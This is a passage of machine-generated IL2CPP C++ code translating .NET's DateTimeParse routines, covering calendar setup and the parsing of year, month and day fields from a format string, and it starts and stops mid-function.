DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_21 = ___dtfi1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_22 = DateTimeFormatInfo_get_InvariantInfo_mF4896D7991425B6C5391BB86C11091A8B715CCDC(/*hidden argument*/NULL); *((RuntimeObject **)L_21) = (RuntimeObject *)L_22; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_21, (RuntimeObject *)L_22); ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_23 = ___parseInfo2; IL2CPP_RUNTIME_CLASS_INIT(GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_24 = GregorianCalendar_GetDefaultInstance_m36338D53A3A355D00060E57621CFDD610C83D87A(/*hidden argument*/NULL); L_23->set_calendar_0(L_24); goto IL_0151; } IL_00b3: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_25 = ___parseInfo2; IL2CPP_RUNTIME_CLASS_INIT(GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_26 = GregorianCalendar_GetDefaultInstance_m36338D53A3A355D00060E57621CFDD610C83D87A(/*hidden argument*/NULL); L_25->set_calendar_0(L_26); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_27 = ___dtfi1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_28 = DateTimeFormatInfo_get_InvariantInfo_mF4896D7991425B6C5391BB86C11091A8B715CCDC(/*hidden argument*/NULL); *((RuntimeObject **)L_27) = (RuntimeObject *)L_28; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_27, (RuntimeObject *)L_28); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_29 = ___result3; int32_t L_30 = L_29->get_flags_8(); if (!((int32_t)((int32_t)L_30&(int32_t)((int32_t)2048)))) { goto IL_0151; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_31 = ___result3; int32_t* L_32 = L_31->get_address_of_flags_8(); int32_t* L_33 = L_32; int32_t L_34 = *((int32_t*)L_33); *((int32_t*)L_33) = (int32_t)((int32_t)((int32_t)L_34|(int32_t)((int32_t)16384))); goto IL_0151; } IL_00e4: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_35 = ___parseInfo2; IL2CPP_RUNTIME_CLASS_INIT(GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_36 = GregorianCalendar_GetDefaultInstance_m36338D53A3A355D00060E57621CFDD610C83D87A(/*hidden argument*/NULL); L_35->set_calendar_0(L_36); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_37 = ___result3; int32_t* L_38 = L_37->get_address_of_flags_8(); int32_t* L_39 = L_38; int32_t L_40 = *((int32_t*)L_39); *((int32_t*)L_39) = (int32_t)((int32_t)((int32_t)L_40|(int32_t)((int32_t)256))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_41 = ___result3; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_42; memset(&L_42, 0, sizeof(L_42)); TimeSpan__ctor_mEB013EB288370617E8D465D75BE383C4058DB5A5((&L_42), (((int64_t)((int64_t)0))), /*hidden argument*/NULL); L_41->set_timeZoneOffset_9(L_42); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_43 = ___result3; int32_t* L_44 = L_43->get_address_of_flags_8(); int32_t* L_45 = L_44; int32_t L_46 = *((int32_t*)L_45); *((int32_t*)L_45) = (int32_t)((int32_t)((int32_t)L_46|(int32_t)((int32_t)512))); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_47 = ___dtfi1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_48 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_47); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_49 = DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862(L_48, /*hidden argument*/NULL); Type_t * L_50 = Object_GetType_m2E0B62414ECCAA3094B703790CE88CBB2F83EA60(L_49, /*hidden argument*/NULL); RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D L_51 = { reinterpret_cast<intptr_t> (GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_0_0_0_var) }; IL2CPP_RUNTIME_CLASS_INIT(Type_t_il2cpp_TypeInfo_var); Type_t * L_52 = Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6(L_51, /*hidden argument*/NULL); bool L_53 = Type_op_Inequality_m615014191FB05FD50F63A24EB9A6CCA785E7CEC9(L_50, L_52, /*hidden argument*/NULL); if (!L_53) { goto IL_0151; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_54 = ___dtfi1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_55 = ___dtfi1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_56 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_55); RuntimeObject * L_57 = DateTimeFormatInfo_Clone_m72D6280296E849FF0BD23A282C1B5ECC81EAF6BA(L_56, /*hidden argument*/NULL); *((RuntimeObject **)L_54) = (RuntimeObject *)((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F *)CastclassSealed((RuntimeObject*)L_57, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var)); Il2CppCodeGenWriteBarrier((RuntimeObject **)L_54, (RuntimeObject *)((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F *)CastclassSealed((RuntimeObject*)L_57, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var))); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_58 = ___dtfi1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_59 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_58); IL2CPP_RUNTIME_CLASS_INIT(GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_60 = GregorianCalendar_GetDefaultInstance_m36338D53A3A355D00060E57621CFDD610C83D87A(/*hidden argument*/NULL); DateTimeFormatInfo_set_Calendar_m6388B63636828B8525557FA2976C965897E8BF3C(L_59, L_60, /*hidden argument*/NULL); } IL_0151: { String_t* L_61 = ___format0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_62 = ___dtfi1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_63 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_62); IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_64 = DateTimeFormat_GetRealFormat_mAAA9091BEC0C4473B1D7377152247CEFD2BC4ED0(L_61, L_63, /*hidden argument*/NULL); return L_64; } } // System.Boolean System.DateTimeParse::ParseByFormat(System.__DTString&,System.__DTString&,System.ParsingInfo&,System.Globalization.DateTimeFormatInfo,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseByFormat_mA0F5500F7D2A3FF7BD1862671B4A12A0E9F66E30 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___format1, ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * ___parseInfo2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result4, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_ParseByFormat_mA0F5500F7D2A3FF7BD1862671B4A12A0E9F66E30_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; int32_t V_3 = 0; int32_t V_4 = 0; int32_t V_5 = 0; int32_t V_6 = 0; int32_t V_7 = 0; double V_8 = 0.0; int32_t V_9 = 0; Il2CppChar V_10 = 0x0; bool V_11 = false; StringBuilder_t * V_12 = NULL; String_t* V_13 = NULL; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 V_14; memset(&V_14, 0, sizeof(V_14)); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 V_15; memset(&V_15, 0, sizeof(V_15)); int32_t V_16 = 0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B76_0 = NULL; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B75_0 = NULL; int32_t G_B77_0 = 0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B77_1 = NULL; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B83_0 = NULL; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B82_0 = NULL; int32_t G_B84_0 = 0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B84_1 = NULL; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B90_0 = NULL; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B89_0 = NULL; int32_t G_B91_0 = 0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B91_1 = NULL; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B97_0 = NULL; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B96_0 = NULL; int32_t G_B98_0 = 0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * G_B98_1 = NULL; { V_0 = 0; V_1 = 0; V_2 = 0; V_3 = 0; V_4 = 0; V_5 = 0; V_6 = 0; V_7 = 0; V_8 = (0.0); V_9 = 0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_0 = ___format1; Il2CppChar L_1 = __DTString_GetChar_m15E6D62E27D5EC6E7E726D2E6A719A95A521CAE6((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_0, /*hidden argument*/NULL); V_10 = L_1; Il2CppChar L_2 = V_10; if ((!(((uint32_t)L_2) <= ((uint32_t)((int32_t)75))))) { goto IL_00a7; } } { Il2CppChar L_3 = V_10; if ((!(((uint32_t)L_3) <= ((uint32_t)((int32_t)46))))) { goto IL_006a; } } { Il2CppChar L_4 = V_10; if ((!(((uint32_t)L_4) <= ((uint32_t)((int32_t)37))))) { goto IL_0053; } } { Il2CppChar L_5 = V_10; if ((((int32_t)L_5) == ((int32_t)((int32_t)34)))) { goto IL_07e6; } } { Il2CppChar L_6 = V_10; if ((((int32_t)L_6) == ((int32_t)((int32_t)37)))) { goto IL_0918; } } { goto IL_09cb; } IL_0053: { Il2CppChar L_7 = V_10; if ((((int32_t)L_7) == ((int32_t)((int32_t)39)))) { goto IL_07e6; } } { Il2CppChar L_8 = V_10; if ((((int32_t)L_8) == ((int32_t)((int32_t)46)))) { goto IL_0990; } } { goto IL_09cb; } IL_006a: { Il2CppChar L_9 = V_10; if ((!(((uint32_t)L_9) <= ((uint32_t)((int32_t)58))))) { goto IL_0087; } } { Il2CppChar L_10 = V_10; if ((((int32_t)L_10) == ((int32_t)((int32_t)47)))) { goto IL_079a; } } { Il2CppChar L_11 = V_10; if ((((int32_t)L_11) == ((int32_t)((int32_t)58)))) { goto IL_074e; } } { goto IL_09cb; } IL_0087: { Il2CppChar L_12 = V_10; if ((((int32_t)L_12) == ((int32_t)((int32_t)70)))) { goto IL_042f; } } { Il2CppChar L_13 = V_10; if ((((int32_t)L_13) == ((int32_t)((int32_t)72)))) { goto IL_0369; } } { Il2CppChar L_14 = V_10; if ((((int32_t)L_14) == ((int32_t)((int32_t)75)))) { goto IL_0640; } } { goto IL_09cb; } IL_00a7: { Il2CppChar L_15 = V_10; if ((!(((uint32_t)L_15) <= ((uint32_t)((int32_t)104))))) { goto IL_00f6; } } { Il2CppChar L_16 = V_10; if ((!(((uint32_t)L_16) <= ((uint32_t)((int32_t)90))))) { goto IL_00ca; } } { Il2CppChar L_17 = V_10; if ((((int32_t)L_17) == ((int32_t)((int32_t)77)))) { goto IL_01ac; } } { Il2CppChar L_18 = V_10; if ((((int32_t)L_18) == ((int32_t)((int32_t)90)))) { goto IL_05a7; } } { goto IL_09cb; } IL_00ca: { Il2CppChar L_19 = V_10; if ((((int32_t)L_19) == ((int32_t)((int32_t)92)))) { goto IL_0957; } } { Il2CppChar L_20 = V_10; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_20, (int32_t)((int32_t)100)))) { case 0: { goto IL_024d; } case 1: { goto IL_09cb; } case 2: { goto IL_042f; } case 3: { goto IL_02f6; } case 4: { goto IL_0320; } } } { goto IL_09cb; } IL_00f6: { Il2CppChar L_21 = V_10; if ((!(((uint32_t)L_21) <= ((uint32_t)((int32_t)115))))) { goto IL_0113; } } { Il2CppChar L_22 = V_10; if ((((int32_t)L_22) == ((int32_t)((int32_t)109)))) { goto IL_03ab; } } { Il2CppChar L_23 = V_10; if ((((int32_t)L_23) == ((int32_t)((int32_t)115)))) { goto IL_03ed; } } { goto IL_09cb; } IL_0113: { Il2CppChar L_24 = V_10; if ((((int32_t)L_24) == ((int32_t)((int32_t)116)))) { goto IL_04af; } } { Il2CppChar L_25 = V_10; if ((((int32_t)L_25) == ((int32_t)((int32_t)121)))) { goto IL_0130; } } { Il2CppChar L_26 = V_10; if ((((int32_t)L_26) == ((int32_t)((int32_t)122)))) { goto IL_0529; } } { goto IL_09cb; } IL_0130: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_27 = ___format1; int32_t L_28 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_27, /*hidden argument*/NULL); V_0 = L_28; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_29 = ___dtfi3; bool L_30 = DateTimeFormatInfo_get_HasForceTwoDigitYears_m4CF064E8CAFE2C1DBCDAE8747137E94ACBA81A7B(L_29, /*hidden argument*/NULL); if (!L_30) { goto IL_014d; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_31 = ___str0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_32 = DateTimeParse_ParseDigits_mC3189AD7B9779F87FA8AB834C58B26B111170110((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_31, 1, 4, (int32_t*)(&V_1), /*hidden argument*/NULL); V_11 = L_32; goto IL_0163; } IL_014d: { int32_t L_33 = V_0; if ((((int32_t)L_33) > ((int32_t)2))) { goto IL_0158; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_34 = ___parseInfo2; L_34->set_fUseTwoDigitYear_4((bool)1); } IL_0158: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_35 = ___str0; int32_t L_36 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_37 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_35, L_36, (int32_t*)(&V_1), /*hidden argument*/NULL); V_11 = L_37; } IL_0163: { bool L_38 = V_11; if (L_38) { goto IL_0180; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_39 = ___parseInfo2; bool L_40 = L_39->get_fCustomNumberParser_7(); if (!L_40) { goto IL_0180; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_41 = ___parseInfo2; MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * L_42 = L_41->get_parseNumberDelegate_8(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_43 = ___str0; int32_t L_44 = V_0; bool L_45 = MatchNumberDelegate_Invoke_mD58C3725D11C533D85FA5D0F3C7CA924F3897CEF(L_42, (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_43, L_44, (int32_t*)(&V_1), /*hidden argument*/NULL); V_11 = L_45; } IL_0180: { bool L_46 = V_11; if (L_46) { goto IL_0194; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_47 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_47, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0194: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_48 = ___result4; int32_t* L_49 = L_48->get_address_of_Year_0(); int32_t L_50 = V_1; Il2CppChar L_51 = V_10; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_52 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_53 = DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988((int32_t*)L_49, L_50, L_51, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_52, /*hidden argument*/NULL); if (L_53) { goto IL_0a8e; } } { return (bool)0; } IL_01ac: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_54 = ___format1; int32_t L_55 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_54, /*hidden argument*/NULL); V_0 = L_55; int32_t L_56 = V_0; if ((((int32_t)L_56) > ((int32_t)2))) { goto IL_01eb; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_57 = ___str0; int32_t L_58 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_59 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_57, L_58, (int32_t*)(&V_2), /*hidden argument*/NULL); if (L_59) { goto IL_0235; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_60 = ___parseInfo2; bool L_61 = L_60->get_fCustomNumberParser_7(); if (!L_61) { goto IL_01db; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_62 = ___parseInfo2; MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * L_63 = L_62->get_parseNumberDelegate_8(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_64 = ___str0; int32_t L_65 = V_0; bool L_66 = MatchNumberDelegate_Invoke_mD58C3725D11C533D85FA5D0F3C7CA924F3897CEF(L_63, (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_64, L_65, (int32_t*)(&V_2), /*hidden argument*/NULL); if (L_66) { goto IL_0235; } } IL_01db: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_67 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_67, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_01eb: { int32_t L_68 = V_0; if ((!(((uint32_t)L_68) == ((uint32_t)3)))) { goto IL_020a; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_69 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_70 = ___dtfi3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_71 = DateTimeParse_MatchAbbreviatedMonthName_m347D9553C124F81EBCD0A0568F36463A02189A15((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_69, L_70, (int32_t*)(&V_2), /*hidden argument*/NULL); if (L_71) { goto IL_0225; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_72 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_72, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_020a: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_73 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_74 = ___dtfi3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_75 = DateTimeParse_MatchMonthName_mB1C51508CD0064B05AA17E5C6468ADDBD222656D((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_73, L_74, (int32_t*)(&V_2), /*hidden argument*/NULL); if (L_75) { goto IL_0225; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_76 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_76, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0225: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_77 = ___result4; int32_t* L_78 = L_77->get_address_of_flags_8(); int32_t* L_79 = L_78; int32_t L_80 = *((int32_t*)L_79); *((int32_t*)L_79) = (int32_t)((int32_t)((int32_t)L_80|(int32_t)((int32_t)1024))); } IL_0235: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_81 = ___result4; int32_t* L_82 = L_81->get_address_of_Month_1(); int32_t L_83 = V_2; Il2CppChar L_84 = V_10; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_85 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_86 = DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988((int32_t*)L_82, L_83, L_84, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_85, /*hidden argument*/NULL); if (L_86) { goto IL_0a8e; } } { return (bool)0; } IL_024d: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_87 = ___format1; int32_t L_88 = __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_87, /*hidden argument*/NULL); V_0 = L_88; int32_t L_89 = V_0; if ((((int32_t)L_89) > ((int32_t)2))) { goto IL_02a4; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_90 = ___str0; int32_t L_91 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_92 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_90, L_91, (int32_t*)(&V_3), /*hidden argument*/NULL); if (L_92) { goto IL_028c; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_93 = ___parseInfo2; bool L_94 = L_93->get_fCustomNumberParser_7(); if (!L_94) { goto IL_027c; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * L_95 = ___parseInfo2; MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * L_96 = L_95->get_parseNumberDelegate_8(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_97 = ___str0; int32_t L_98 = V_0; bool L_99 = MatchNumberDelegate_Invoke_mD58C3725D11C533D85FA5D0F3C7CA924F3897CEF(L_96, (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_97, L_98, (int32_t*)(&V_3), /*hidden argument*/NULL); if (L_99) { goto IL_028c; } } IL_027c: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_100 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_100, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_028c: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_101 = ___result4; int32_t* L_102 = L_101->get_address_of_Day_2(); int32_t L_103 = V_3; Il2CppChar L_104 = V_10; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_105 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_106 = DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988((int32_t*)L_102, L_103, L_104, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_105, /*hidden argument*/NULL); if (L_106) { goto IL_0a8e; } } { return (bool)0; } IL_02a4: { int32_t L_107 = V_0; if ((!(((uint32_t)L_107) == ((uint32_t)3)))) { goto IL_02c3; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_108 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_109 = ___dtfi3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_110 = DateTimeParse_MatchAbbreviatedDayName_m618C84891A479DEDF2B78D5CD7A8691C72A2FB0B((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_108, L_109, (int32_t*)(&V_4), /*hidden argument*/NULL); if (L_110) { goto IL_02de; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_111 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_111, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_02c3: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_112 = ___str0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_113 = ___dtfi3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_114 = DateTimeParse_MatchDayName_mD95E4FCC4500803D388819713034C5B32EEEB40B((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_112, L_113, (int32_t*)(&V_4), /*hidden argument*/NULL); if (L_114) { goto IL_02de; } } { 